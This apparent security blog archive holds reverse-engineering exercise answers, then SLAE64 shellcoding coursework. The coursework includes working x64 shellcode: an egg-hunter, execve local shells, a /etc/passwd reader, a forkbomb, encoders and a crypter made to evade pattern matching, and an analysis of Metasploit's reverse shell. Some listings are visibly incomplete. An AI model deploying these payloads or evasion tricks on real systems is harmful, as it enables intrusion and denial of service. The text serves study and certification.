Wednesday, December 31, 2014

Practical Reverse Engineering p.17 #4

Question number 4 on page 17 of Practical Reverse Engineering is as follows:

In all of the calling conventions explained, the return value is stored in a 32-bit register (EAX). What happens when the return value does not fit in a 32-bit register? Write a program to experiment and evaluate your answer. Does the mechanism change from compiler to compiler?

Here is a C function which returns a value that is a 128-bit struct:

struct toolong {
    int a;
    int b;
    int c;
    int d;
};

struct toolong get_toolong()
{
    struct toolong t;

    t.a = 0xDABBAD00;
    t.b = 0xDEADBEEF;
    t.c = 0xBADF00D;
    t.d = 0xBA5EBA11;

    return t;
}

Here is what happens when it is compiled with: gcc -O3 -m32

; GCC 4.8.2

    mov    eax, dword ptr [esp+0x4]
    mov    dword ptr [eax], 0xdabbad00
    mov    dword ptr [eax+0x4], 0xdeadbeef
    mov    dword ptr [eax+0x8], 0xbadf00d
    mov    dword ptr [eax+0xc], 0xba5eba11
    ret    0x4

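EAX holds a pointer rather than the struct itself. The caller passes a hidden pointer to storage it has reserved (read here from [ESP + 4]), the function writes the four fields through it, and that same pointer is returned in EAX. The ret 0x4 pops the hidden pointer off the stack on the way out.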

The compiler for Microsoft Visual Studio 2013 produced essentially the same assembly, but with a full function frame. It was compiled with: /GS- /Gd /Gy /Ox

; MSVC 17.00.60610.1

    push    ebp
    mov     ebp, esp
    mov     eax, [ebp + 8]
    mov     dword ptr [eax], 0DABBAD00h
    mov     dword ptr [eax + 4], 0DEADBEEFh
    mov     dword ptr [eax + 8], 0BADF00Dh
    mov     dword ptr [eax + 0Ch], 0BA5EBA11h
    pop     ebp
    ret

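Notice that GCC reads the struct's address from [ESP + 4] and MSVC from [EBP + 8]. These are the same stack slot, the first argument: after push ebp and mov ebp, esp, [EBP + 8] is what [ESP + 4] was on entry. In both cases the caller must allocate space for the struct and pass a pointer to it as a hidden first argument.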

Practical Reverse Engineering p.17 #3

Question number 3 on page 17 of Practical Reverse Engineering is as follows:

In the example function, addme, what would happen if the stack pointer were not properly restored before executing RET?

    push ebp
    mov ebp, esp
    movsx eax, word ptr [ebp+8]
    movsx ecx, word ptr [ebp+0Ch]
    add eax, ecx
    mov esp, ebp
    pop ebp
    ret

In this case, the body of the function never modifies ESP after the prologue (no arithmetic on it and no unbalanced PUSH/POP), so ESP already equals EBP and the MOV ESP, EBP is redundant.

In most functions, however, ESP is moved to make room for locals. Without the MOV ESP, EBP instruction in the function epilogue, POP EBP would load the wrong value and RET would jump to whatever data happens to be on top of the stack at that point. This can often mean a crash, or at the very least unexpected behavior.

Practical Reverse Engineering p.17 #2

Question number 2 on page 17 of Practical Reverse Engineering is as follows:

Come up with at least two code sequences to set EIP to 0xAABBCCDD.

One sequence would be to push that address and then return.

    push 0xAABBCCDD
    ret

Another sequence would be to simply jump to the address.

    jmp 0xAABBCCDD

You could also call the address.

    call 0xAABBCCDD

Practical Reverse Engineering p.17 #1

Question number 1 on page 17 of Practical Reverse Engineering is as follows:

Given what you learned about CALL and RET, explain how you would read the value of EIP? Why can’t you just do MOV EAX, EIP?

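You can't do MOV EAX, EIP because 32-bit x86 has no instruction encoding that names EIP as an operand. It is not a general-purpose register, and it can only be changed indirectly through control-flow instructions such as JMP, CALL, and RET.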

Here is one way you can get EIP (after the call) into another register.

_start:
    call geteip
    ; ...

geteip:
    pop eax       ; eax = return address (_start + sizeof(call))
    ; push eax
    ; ret

Tuesday, December 30, 2014

Practical Reverse Engineering p.11 #1

Question number 1 on page 11 of Practical Reverse Engineering is as follows:

1. This function uses a combination SCAS and STOS to do its work. First, explain what is the type of the [EBP+8] and [EBP+C] in line 1 and 8, respectively. Next, explain what this snippet does.

mov edi, [ebp+8]
mov edx, edi
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 2
neg ecx
mov al, [ebp+0Ch]
mov edi, edx
rep stosb
mov eax, edx

The first part of the question asks to define the types at [EBP+8] and [EBP+C].

For [EBP+8], we see it is moved into the EDI register a few instructions before REPNE SCASB. That instruction is generally used in string operations, in which EDI is the "destination index" of the operation. It is safe to assume that [EBP+8] is a byte buffer; the char* type.

Looking at [EBP+C], we see that it is moved into the AL register. This is an obvious hint to us that the value is a single byte; the char type.

So just by deducing the types and seeing their context, we have a rough idea of what is going on. The first half of the code sets ECX to -1 and EAX to 0 (the null byte), then scans the buffer until the null byte is found, decrementing ECX once for every byte scanned, including the terminator. For a string of length n this leaves ECX at -(n + 2). Two is then added to ECX and the result is negated, which gives n.

In the end, the first part of the code computes the length of the buffer before the null byte. It's an implementation of the strlen() function. The second part of the code uses REP STOSB, which stores the AL register to the memory at EDI, ECX times, advancing EDI after each store. This is the memset() function.

Here is the function in C:

/* cdecl */ 
char *asm_func(char *buffer, char byte)
{
   memset(buffer, byte, strlen(buffer));
   return buffer;
}
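
To check the ECX arithmetic described above, here is a small Python sketch that traces the register by hand. It is only a model of the snippet, not a real emulator, and the helper names scasb_length and asm_func are made up for this illustration.

```python
MASK32 = 0xFFFFFFFF


def scasb_length(buffer: bytes) -> int:
    """Trace ECX through: or ecx,-1 / repne scasb / add ecx,2 / neg ecx."""
    ecx = MASK32                      # or ecx, 0FFFFFFFFh
    edi = 0                           # offset into the buffer
    while ecx != 0:                   # repne stops when ECX reaches zero...
        byte = buffer[edi]
        edi += 1
        ecx = (ecx - 1) & MASK32      # ECX drops once per byte scanned
        if byte == 0:                 # ...or when the byte equals AL (0)
            break
    ecx = (ecx + 2) & MASK32          # add ecx, 2
    return (-ecx) & MASK32            # neg ecx


def asm_func(buffer: bytearray, fill: int) -> bytearray:
    """strlen followed by memset, mirroring the C version."""
    count = scasb_length(bytes(buffer))
    buffer[:count] = bytes([fill & 0xFF]) * count   # rep stosb
    return buffer
```

Only the bytes before the terminator are overwritten; the null byte and anything after it are left alone.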

Sunday, December 28, 2014

Hex/Binary Pebble Watchface

My girlfriend got me the Pebble Steel smart watch for Christmas. The watch runs on an ARM Cortex M3 with a modified FreeRTOS kernel (which is described more as a threading library than a traditional operating system).

When I get a device like this I always have to poke around the API and see what it has to offer. So I looked at the getting started guide and wrote an app that simply displays the time and date in hexadecimal and binary forms.

The API is in C, and you only have access to a subset of the standard library. For instance, instead of doing itoa() with a base of two to display the numbers as binary, I had to create the following monstrosity:

const char *bytebin(int n, int m, char *b, int l)
{
    /* m is the mask for the highest bit to print, l the number of bits */
    for (b[0] = '\0'; m > 0 && l > 0; m >>= 1, --l)
        strcat(b, ((n & m) == m) ? "1" : "0");
    return b;
}

And this is how I use it:

    snprintf(binDateBuffer, sizeof(binDateBuffer), "%s/%s/%s", 
           bytebin(tick_time->tm_mon + 1, 0x8, binMon, 4), 
           bytebin(tick_time->tm_mday, 0x10, binDay, 5), 
           bytebin(tick_time->tm_year + 1900, 0x400, binYr, 11));
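
For comparison, the same mask-walking idea can be sketched in Python, which makes it easy to check what the watchface should display for a given date. The function names and the sample date are illustrative only, not part of the Pebble app.

```python
def bytebin(n: int, mask: int, width: int) -> str:
    """Walk a single-bit mask from the high bit down, emitting '1' or '0'."""
    bits = []
    while mask > 0 and width > 0:
        bits.append("1" if (n & mask) == mask else "0")
        mask >>= 1
        width -= 1
    return "".join(bits)


def bin_date(month: int, day: int, year: int) -> str:
    """Format month/day/year with the same masks used in the C call."""
    return "/".join((
        bytebin(month, 0x8, 4),     # 4 bits cover months 1..12
        bytebin(day, 0x10, 5),      # 5 bits cover days 1..31
        bytebin(year, 0x400, 11),   # 11 bits cover years up to 2047
    ))
```

Calling bin_date(12, 28, 2014) gives the string for the date of this post.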

The development IDE is hosted in the cloud. You literally just type in some C code and press play. The web application then compiles it and uploads it to your phone which sends it to the watch via Bluetooth. This lets you jump right into developing without any setup.

Friday, December 26, 2014

Architecture Detection (x86 or x64) Assembly Stub

This stub is useful for combining both a 32-bit and 64-bit shellcode payload into a single shot. Knowing the distinction in architecture is important for many types of payloads. For instance, on Windows the Thread Information Block is in the FS segment register on x86, and is in GS on x64.

Here are 5 bytes you can use to detect the architecture you're on:


    xor ecx, ecx        ; set ecx to 0
    db 0x41             ; x86 opcode for: inc ecx

    loop x64_code       ; ecx now -1 in x64, we jmp

    ; use fs segment

    ; ret

x64_code:
    ; use gs segment

Those familiar with x64 assembly should recognize that the bytes 0x40 through 0x4F are REX prefixes in 64-bit mode, whereas on x86 they are the one-byte inc and dec instructions. We can use this difference to make the same bytes behave differently on each architecture. In this case, if running in x64, the inc ecx opcode becomes a prefix for the loop. The loop instruction decrements ecx (rcx in 64-bit mode) by one, and if the result is not equal to 0 it will jump to the given label.
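
The difference can be modelled with a toy interpreter in Python. This is only a sketch: it understands nothing beyond the three opcodes in the stub, and the function name loop_is_taken is made up for this illustration.

```python
STUB = bytes([0x31, 0xC9, 0x41, 0xE2, 0x01])   # xor ecx,ecx / 0x41 / loop +1


def loop_is_taken(mode_bits: int) -> bool:
    """Toy model of the stub; returns True if the loop branch is taken."""
    width_mask = (1 << mode_bits) - 1
    counter = 0
    pc = 0
    while pc < len(STUB):
        opcode = STUB[pc]
        if opcode == 0x31 and STUB[pc + 1] == 0xC9:    # xor ecx, ecx
            counter = 0
            pc += 2
        elif opcode == 0x41:
            if mode_bits == 32:
                counter = (counter + 1) & width_mask   # inc ecx
            # in 64-bit mode 0x41 is a REX.B prefix and changes nothing here
            pc += 1
        elif opcode == 0xE2:                           # loop rel8
            counter = (counter - 1) & width_mask
            return counter != 0
        else:
            raise ValueError("unexpected opcode")
    raise ValueError("stub ended without reaching loop")
```

In 32-bit mode the counter goes 0, 1, 0 and the loop falls through; in 64-bit mode it goes 0, -1 and the branch is taken.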

I used db 0x41 instead of inc ecx in the source code, since nasm uses a modern 2-byte instruction to prevent this ambiguity when we actually want the 1-byte increment. Here are the different outputs, which clearly show what is going on:


 "\x31\xc9"              /* xor    %ecx,%ecx */
 "\x41"                  /* inc    %ecx */
 "\xe2\x01"              /* loop   x64_code  */     <-- ecx = 0, no jmp


 "\x31\xc9"              /* xor    %ecx,%ecx */
 "\x41\xe2\x01"          /* rex.B loop x64_code  */ <-- ecx = -1, jmp

Thursday, December 25, 2014

Final Thoughts on the SLAE64 Certification

As is obvious by my posts over the past few days, I was working on fulfilling the requirements of the x86/64 Assembly and Shellcoding on Linux class at SecurityTube/Pentester Academy to obtain the SLAE64 certification.

All I was seeking from doing this was to fill in the gaps in my knowledge. The course material was exceptional compared to my extremely basic assembly class at a Cal State, and it cost twenty times less. I liked that it makes you put your knowledge to the true test by completing 7 practical assignments of varying difficulty. I certainly have respect for others who have completed the certification.

Wednesday, December 24, 2014

x64 Egg-Hunter Shellcode Stager

The "egg-hunter" is a form of staged shellcode that is useful when you can inject a large payload into a process but aren't sure where in memory it will end up. If you can get the instruction pointer to point to a smaller piece of hunter code, it can search memory to find the main payload, which is prepended with a small tag of bytes (the egg). Egg-hunter code, even more so than other shellcode, needs to be as small as possible.

Here is an example that assumes our main payload will be farther down the stack. Recall the stack grows toward lower addresses, so we will load the current stack pointer and increase it, going back toward higher addresses (the bottom of the stack). The egg is a simple 4-byte sequence that we are searching for, and we jump to what follows it.


egg equ  'z0x0'

global _start
section .text

_start:
    push rsp                  ; load current stack pointer
    pop rcx
    add rcx, 0xff             ; we need to skip our own code

hunt:
    inc rcx                   ; higher addresses
    cmp dword [rcx - 4], egg
    jne hunt

    jmp rcx

This assembles down into a nice compact 20 bytes.


Remember RCX begins at the stack pointer, the start of our hunter shellcode. We don't want to accidentally find the copy of the egg that is embedded in the hunter's own cmp instruction (doing so in this case will result in an infinite loop). Since we know this shellcode is 20 bytes, we add 4 to it (since the compare subtracts 4) to skip completely over all of our own code, and dig deeper down into the stack. So in the final payload we can replace the addition of 0xff to RCX with 0x18 (decimal 24). A value that small also fits in a one-byte immediate, which keeps the add free of null bytes.
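
The search loop and the reason for the skip can be sketched in Python over a flat byte string. This is a model only: the memory layout, the NOP filler and the single 0xcc payload byte are assumptions made for the illustration.

```python
EGG = b"z0x0"

# The 20 hunter bytes from the listing; note the egg sits inside the cmp.
HUNTER = bytes.fromhex(
    "54" "59" "4883c118" "48ffc1" "8179fc7a307830" "75f4" "ffe1"
)


def hunt(memory: bytes, start: int, skip: int) -> int:
    """Return the offset the hunter would jump to (the byte after the egg)."""
    rcx = start + skip                  # add rcx, skip
    while rcx < len(memory):
        rcx += 1                        # inc rcx
        if rcx >= 4 and memory[rcx - 4:rcx] == EGG:   # cmp dword [rcx - 4], egg
            return rcx                  # jmp rcx
    raise LookupError("egg not found")


# Hypothetical layout: hunter, some filler, then the egg and a payload byte.
memory = HUNTER + b"\x90" * 32 + EGG + b"\xcc"
```

With a skip of 0x18 the search lands on the real payload; with no skip it stops inside the hunter itself, right after the egg bytes in the cmp.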

Finally, here is a C example that sets up a dirty stack, which has a local shell payload for the egghunter to find. It is compiled with: gcc -m64 -z execstack egghunt.c

int main(void)
{
    char egghunter[] =
        "\x54"                          /* push   %rsp */
        "\x59"                          /* pop    %rcx */
        "\x48\x83\xc1\x18"              /* add    $0x18,%rcx */
        "\x48\xff\xc1"                  /* inc    %rcx */
        "\x81\x79\xfc\x7a\x30\x78\x30"  /* cmpl   $egg,-0x4(%rcx) */
        "\x75\xf4"                      /* jne    hunt */
        "\xff\xe1"                      /* jmpq   *%rcx */;

    char stackgarbage[] = 

    char eggpayload[] = 
        "z0x0"                          /* egg */
        "\x31\xf6"                      /* xor    %esi,%esi */
        "\x48\xbf\xd1\x9d\x96\x91\xd0"  /* movabs $str,%rdi */
        "\x8c\x97\xff"                  /* . */
        "\x48\xf7\xdf"                  /* neg    %rdi */
        "\xf7\xe6"                      /* mul    %esi */
        "\x04\x3b"                      /* add    $0x3b,%al */
        "\x57"                          /* push   %rdi */
        "\x54"                          /* push   %rsp */
        "\x5f"                          /* pop    %rdi */
        "\x0f\x05"                      /* syscall */;

    (*(void(*)()) egghunter)();

    return 0;
}

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Monday, December 22, 2014

x64 Shellcode Byte-Rotate Encoder

Shellcode encoders are used to defeat basic pattern matching or remove bad bytes from a payload. I've written before about Metasploit's x64/xor encoder, which is pretty simple and very effective.

I wrote an encoder that rotates bytes. I decided to rotate 3 bits left when encoding, meaning the decoder needs to rotate right 3 bits. Here is the decoder logic:

_start:
    jmp encoded

getaddr:
    pop rbx         ; *rbx stores data

    xor ecx, ecx
    add cl, 0xff    ; replace with shellcode size

decode:
    ror byte [rbx + rcx], 0x3
    loop decode     ; rcx runs from size down to 1

    jmp rbx

encoded:
    call getaddr

    ; db 0x.... encoded bytes go here

This resulted in the following 21 byte stub:


I created a Python script that rotates each byte of the shellcode left by 3 bits, and then prepends the decoder stub (changing the length added to the cl register appropriately).

''' x64 Shellcode Bit-Rotate Encoder '''

def rol(byte, count):
    return (byte << count | byte >> (8 - count)) & 0xff

def hex_string(byte):
    # zero-pad so that values below 0x10 still produce two hex digits
    return "\\x%02x" % byte

def rot_encode_vector(shellcode):
    encoded = []
    for byte in shellcode:
        encoded.append(rol(byte, 3))

    return encoded

def add_decoder_stub(encoded):
    # jmp encoded; pop rbx; xor ecx, ecx; add cl, <length appended below>
    decoder = "\\xeb\\x0e\\x5b\\x31\\xc9\\x80\\xc1"
    decoder += hex_string(len(encoded))
    decoder += "\\xc0\\x0c\\x0b\\x03\\xe2\\xfa\\xff\\xe3"
    decoder += "\\xe8\\xed\\xff\\xff\\xff"

    for byte in encoded:
        decoder += hex_string(byte)

    return decoder

def rot_encode(shellcode):
    shellcode_vector = shellcode.split('\\x')[1 : ]
    shellcode_vector = [int(y, 16) for y in shellcode_vector]

    encoded_vector = rot_encode_vector(shellcode_vector)
    complete = add_decoder_stub(encoded_vector)

    return complete, encoded_vector, shellcode_vector

if __name__ == '__main__':
    import argparse
    args = argparse.ArgumentParser(description='Bit-Rotate Encoder')
    args.add_argument('shellcode', help='shellcode to encode')

    argv = args.parse_args()

    out, encv, scv = rot_encode(argv.shellcode)

    print('Original length: %d' % (len(scv)))
    print(argv.shellcode)
    print('Encoded length: %d' % (len(out) // 4))
    print(out)
    print('db ' + ', '.join(map(hex, encv)))
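
The decoder's half of the round trip can be sketched the same way. The ror and decode helpers below are not part of the script above; they only illustrate that rotating right by 3 undoes the encoding.

```python
def rol(byte: int, count: int) -> int:
    """Rotate an 8-bit value left by count bits."""
    return ((byte << count) | (byte >> (8 - count))) & 0xFF


def ror(byte: int, count: int) -> int:
    """Rotate an 8-bit value right by count bits."""
    return ((byte >> count) | (byte << (8 - count))) & 0xFF


def decode(encoded: bytes) -> bytes:
    """Undo the rotate-left-by-3 encoding, one byte at a time."""
    return bytes(ror(b, 3) for b in encoded)
```

For example, the first original byte 0x48 encodes to 0x42 and decodes back to 0x48.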

To run it, just enter the shellcode you want to use. Here is an example using a 32 byte execve local shell.

root@kali:~/SLAE64# python ./ "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"

Original length: 32

Encoded length: 53

db 0x42, 0x89, 0x6, 0x82, 0x42, 0xdd, 0x79, 0x13, 0x4b, 0x73, 0x79, 0x79, 0x9b, 0x43, 0x9a, 0x42, 0x4c, 0x3f, 0x82, 0x42, 0x4c, 0x17, 0xba, 0x42, 0x4c, 0x37, 0x42, 0x1c, 0x6, 0xd9, 0x78, 0x28

This bears very little resemblance to the original bytes, and looks like garbage code when disassembled.

"\x42\x89\x06"                  /* rex.X mov %eax,(%rsi) */
"\x82"                          /* (bad) */
"\x42\xdd\x79\x13"              /* rex.X fnstsw 0x13(%rcx) */
"\x4b\x73\x79"                  /* rex.WXB jae 99  */
"\x79\x9b"                      /* jns    ffffffffffffffbd */
"\x43\x9a"                      /* rex.XB (bad) */
"\x42"                          /* rex.X */
"\x4c\x3f"                      /* rex.WR (bad) */
"\x82"                          /* (bad) */
"\x42"                          /* rex.X */
"\x4c\x17"                      /* rex.WR (bad) */
"\xba\x42\x4c\x37\x42"          /* mov    $0x42374c42,%edx */
"\x1c\x06"                      /* sbb    $0x6,%al */
"\xd9\x78\x28"                  /* fnstcw 0x28(%rax) */


Sunday, December 21, 2014

x64 Linux Polymorphic read file shellcode

There is a read file shellcode on shell-storm that is used to read the /etc/passwd file. On Linux this file lists user accounts, while the password hashes are actually stored in the /etc/shadow file. Regardless, here are the contents of the shellcode:

; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start

section .text

_start:
    jmp _push_filename

_readfile:
; syscall open file
    pop rdi ; pop path value
    ; NULL byte fix
    xor byte [rdi + 11], 0x41
    xor rax, rax
    add al, 2
    xor rsi, rsi ; set O_RDONLY flag
    syscall
; syscall read file
    sub sp, 0xfff
    lea rsi, [rsp]
    mov rdi, rax
    xor rdx, rdx
    mov dx, 0xfff; size to read
    xor rax, rax
    syscall
; syscall write to stdout
    xor rdi, rdi
    add dil, 1 ; set stdout fd = 1
    mov rdx, rax
    xor rax, rax
    add al, 1
    syscall
; syscall exit
    xor rax, rax
    add al, 60
    syscall

_push_filename:
    call _readfile
    path: db "/etc/passwdA"

This comes out to 82 bytes.


Here are the same system calls with the logic in a different fashion, which will defeat basic pattern matching.


    xor esi, esi
    mul esi

    push rdx    ; '\0'

    mov rcx, 0x6477737361702f63  ; 'c/passwd'
    push rcx

    mov rcx, 0x74652f2f2f2f2f2f  ; '//////et'
    push rcx

    push rsp
    pop rdi

    mov al, 0x2
    syscall         ; open

    push rax
    pop rdi
    push rsp
    pop rsi
    push rdx
    push rdx        ; saving lots of 0's
    push rdx
    push rdx
    pop rax
    mov dx, 0x999
    syscall         ; read

    pop rdi
    inc edi
    push rax
    pop rdx
    pop rax
    inc eax
    syscall         ; write

    pop rax
    mov al, 60
    syscall         ; exit

The original code uses lots of mov operations, whereas this version accomplishes the same using the stack. Instead of using add to set RAX, it uses mov (although it could again also use the stack). The way a pointer to the string is obtained is also much different.
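
To see how the pushed constants turn into a path, here is a short Python sketch that lays the qwords out the way they end up in memory. The helper name stack_string is made up for this illustration.

```python
import struct


def stack_string(*qwords: int) -> bytes:
    """Join little-endian qwords, listed from lowest address to highest.

    The value pushed last sits at the lowest address, so the arguments
    are given in the reverse of the push order.
    """
    return b"".join(struct.pack("<Q", q) for q in qwords)


# pushed last -> first: '//////et', 'c/passwd', then the zero terminator
path = stack_string(0x74652F2F2F2F2F2F, 0x6477737361702F63, 0)
```

The extra slashes pad the path to a multiple of eight bytes, which avoids null bytes in the immediates.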

The final version comes out to 63 bytes, which is shorter than the original shellcode. This means we could add NOPs to be even more polymorphic.



x64 Linux Polymorphic execve() shellcode

There are many versions of execve shellcode for both x86 and x64 Linux. These work by executing some variation of the system call execve("/bin/sh", 0, 0), granting a local shell. Here is one of these shellcodes from shell-storm.
; [Linux/X86-64]
; Dummy for shellcode:
; execve("/bin/sh", ["/bin/sh"], NULL)
; hophet [at]

global _start
section .text

_start:
    xor rdx, rdx
    mov rbx, 0x68732f6e69622fff
    shr rbx, 0x8

    push rbx
    mov rdi, rsp
    xor rax, rax
    push rax
    push rdi
    mov rsi, rsp

    mov al, 0x3b
    syscall

It assembles to 33 bytes, as follows:


Here is a polymorphic version which defeats pattern matching by changing the instructions, and rearranging the order things are done.


    xor esi, esi

    mov rdi, 0xff978cd091969dd1

    neg rdi
    mul esi

    add al, 0x3b

    push rdi
    push rsp
    pop rdi
    syscall


The polymorphic version comes in at 24 bytes, which is actually shorter than the original. This means we could add NOPs to be even more polymorphic.
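
The neg rdi step is what hides the "/bin/sh" string. A quick Python check of the two's complement arithmetic (the helper name neg64 is only for this sketch):

```python
import struct

MASK64 = (1 << 64) - 1


def neg64(value: int) -> int:
    """Two's complement negation of a 64-bit value, like neg rdi."""
    return (-value) & MASK64


decoded = neg64(0xFF978CD091969DD1)
as_bytes = struct.pack("<Q", decoded)   # how the qword looks in memory
```

The constant contains no null bytes, while its negation is the null-terminated string.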



x64 Linux Polymorphic forkbomb shellcode

A forkbomb is an attack payload which causes the exploited program to create new instances of itself, in a permanent loop. The end result is basically a denial of service, as the program reproduces itself so many times that there are no more system resources left to use.

On shell-storm there is a simple 7 byte forkbomb shellcode for x86. Translated to x64, it would look something like this:

forkbomb:
    push 0x39
    pop rax
    syscall
    jmp short forkbomb

This gives us the following shellcode, also 7 bytes:


We can do some basic polymorphing of this code.

forkbomb:
    shl eax, 0x40       ; count is masked to 5 bits, so eax is left unchanged
    mov al, 0x38
    inc al
    syscall
    jne forkbomb

This becomes 11 bytes, which is right around 150% of the size of the original. This will defeat basic pattern matching.


However, this still contains some of the same bytes, at the point of the syscall. I created the following polymorphic code to have a totally different footprint.

forkbomb:
    nop
    lea rcx, [rel forkbomb]

    push rcx
    shl rax, 64         ; count is masked to 6 bits, so rax is left unchanged
    mov al, 0x38
    inc al

    push 0xc359040e
    add word [rsp], 0x0101
    push rsp
    ret

It contains no bytes that are the same as the original. It uses encoding to disguise syscall. The only reason for the nop instruction is so that the RIP-relative addressing won't contain the byte \xf9, like the original shellcode.

The new payload is 29 bytes, null-free.


It sets up the stack as follows, then unmasks the syscall and returns:

[&rsp]                     <-- low address
[syscall - mask 0x0101]
[&forkbomb]                <-- high address
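
The unmasking step can be checked with a few lines of Python. This sketch only models the add word [rsp], 0x0101 on the low four bytes of the pushed value; the function name unmask is made up.

```python
import struct


def unmask(pushed: int, mask: int = 0x0101) -> bytes:
    """Add the mask to the low 16-bit word, as add word [rsp], 0x0101 does."""
    raw = bytearray(struct.pack("<I", pushed & 0xFFFFFFFF))
    low_word = struct.unpack_from("<H", raw, 0)[0]
    struct.pack_into("<H", raw, 0, (low_word + mask) & 0xFFFF)
    return bytes(raw)


# 0f 05 = syscall, 59 = pop rcx, c3 = ret
code = unmask(0xC359040E)
```

Before the add, the stack holds 0e 04 59 c3, so the syscall opcode never appears in the payload itself.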

Different code, same result.


x64 Shellcode One-Time Pad Crypter

I chose to use C++11 to create a shellcode crypter. I decided the following data structure is one that works well when dealing with shellcode in C++:

typedef std::vector<unsigned char> bytearr_t;

I had a bit of difficulty when trying to find an appropriate encryption method to use. I knew that I didn't want to use a block cipher, as the extra padding would only increase the length of the shellcode. Most of the stream ciphers have a number of attacks on them, and the ones that don't are pretty obscure.

One cipher that is provably secure is the one-time pad, provided the key is truly random, as long as the data being encrypted, and never reused. With a one-time pad, it is impossible to recover the message without the right key, since every plaintext of the same length is equally consistent with a given ciphertext. Here is how I generate a key:

bytearr_t generate_key(size_t len)
{
    std::random_device rd;
    std::mt19937 mt(rd());
    // integer distribution over the full byte range
    std::uniform_int_distribution<int> dist(0, 255);

    bytearr_t ret;

    for (size_t i = 0; i < len; ++i)
        ret.push_back((unsigned char)dist(mt));

    return ret;
}

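There are other ways to generate the key, but this one means we will always end up with something somewhat unique. Keep in mind that std::mt19937 is not a cryptographically secure generator, so a key produced this way falls short of a true one-time pad. Here is the encryption method, which is a basic xor stream cipher: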

bytearr_t one_time_xor(bytearr_t sc, bytearr_t key)
{
    bytearr_t ret;

    assert(sc.size() == key.size());

    for (size_t i = 0; i < sc.size(); ++i)
        ret.push_back(sc[i] ^ key[i]);

    return ret;
}

You might be thinking, a simple xor is all that's being used? Well, you're not alone, and there are theoretical attacks on one-time pads. For instance, if someone knows our payload ends with syscall, they can easily change those bytes of the payload into something else. But if someone can garble that, they can garble anything, and prevent the payload from running in the first place, so we shouldn't be concerned. Even if we actually do have that information leak, the rest of the payload will still be unintelligible without the right key.
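
Since xor is its own inverse, the same routine both encrypts and decrypts. Here is a minimal Python sketch of the idea. It uses os.urandom for the key rather than the C++ generator above, and the sample ciphertext and key are the two arguments passed to the -d run in the transcript below.

```python
import os


def generate_key(length: int) -> bytes:
    """Key as long as the message, drawn from the OS random source."""
    return os.urandom(length)


def one_time_xor(data: bytes, key: bytes) -> bytes:
    """XOR each data byte with the matching key byte."""
    if len(data) != len(key):
        raise ValueError("key must be exactly as long as the data")
    return bytes(d ^ k for d, k in zip(data, key))


ciphertext = bytes.fromhex("697789dd5a004f89c7b48eecc70546330b3127de2fe2719d")
key = bytes.fromhex("5881c1628b9dd9181738191 38ff299c4ed351c897bbd7e98".replace(" ", ""))
plaintext = one_time_xor(ciphertext, key)
```

Decrypting the sample pair gives back the 24-byte local shell payload.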

 The following example shows encryption of a simple local shell payload.

root@kali:~# g++ -std=c++11 -m64 -z execstack crypter.cpp

root@kali:~# ./a.out \x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05

Size: 24



root@kali:~# ./a.out -d \x69\x77\x89\xdd\x5a\x00\x4f\x89\xc7\xb4\x8e\xec\xc7\x05\x46\x33\x0b\x31\x27\xde\x2f\xe2\x71\x9d \x58\x81\xc1\x62\x8b\x9d\xd9\x18\x17\x38\x19\x13\x8f\xf2\x99\xc4\xed\x35\x1c\x89\x7b\xbd\x7e\x98


Press any key to execute...
# whoami


Saturday, December 20, 2014

A Look at the linux/x64/shell_reverse_tcp Metasploit Payload

After I finished micro optimizing my reverse TCP port shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 74 bytes. My payload is 77 bytes, however mine doesn't contain any null-bytes. Metasploit's will always contain nulls, even if your IP and port do not.

Even though I was sad to see it contained null-bytes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_reverse_tcp LHOST= LPORT=4444 C
 * linux/x64/shell_reverse_tcp - 74 bytes

I threw this into a C file.

unsigned char sc[] = 

    (*(void(*)()) sc)();

I compiled it: gcc -m64 -z execstack msfreverse.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

Again as I saw in the bind shell version, I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here again is a high level look at what they did to accomplish this:

push   0x29
pop    rax
cdq
push   0x2
pop    rdi
push   0x1
pop    rsi
syscall

Next we come across an area with null-bytes. Since I used 127.0.0.1 for the address, there are null-bytes. I got around this in my own shellcode by subtracting a mask, and adding it back when the shellcode is run.

One thing they did that shrinks the code considerably is load the entire struct sockaddr with a single mov instruction.

0x000000000060088e in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088e <sc+14>:    movabs $0x100007f5c110002,%rcx
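
The immediate in that movabs is the first eight bytes of a struct sockaddr_in read as a little-endian qword. A short Python sketch shows how it is put together (the function name sockaddr_in_qword is made up for this illustration):

```python
import socket
import struct


def sockaddr_in_qword(ip: str, port: int) -> int:
    """Pack family, port and address the way they sit in memory."""
    raw = (
        struct.pack("<H", 2)         # sin_family = AF_INET, host byte order
        + struct.pack(">H", port)    # sin_port, network byte order
        + socket.inet_aton(ip)       # sin_addr, network byte order
    )
    return struct.unpack("<Q", raw)[0]


value = sockaddr_in_qword("127.0.0.1", 4444)
```

The zero bytes in the family field and in the address are where the null-bytes in the payload come from.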

It looks like they actually end up with some pollution in their stack when the syscall is made.

(gdb) x/4xw $rsi
0x7fffffffe330:    0x5c110002    0x0100007f    0x004004bc    0x00000000

We can compare this to  my version, which cleans the stack first.
(gdb) x/4xw $rsi
0x7fffffffe328:    0x5c110002    0x0100007f    0x00000000    0x00000000

I ran both programs through strace, and got identical syscalls.

connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("")}, 16)

